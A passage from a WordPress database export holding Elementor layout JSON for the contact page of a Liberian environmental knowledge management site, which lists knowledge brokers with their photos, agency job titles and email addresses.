\\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23290,3380,'_elementor_edit_mode','builder'),(23291,3380,'_elementor_template_type','wp-page'),(23292,3380,'_elementor_version','3.0.16'),(23293,3380,'_wp_page_template','default'),(23294,3380,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br 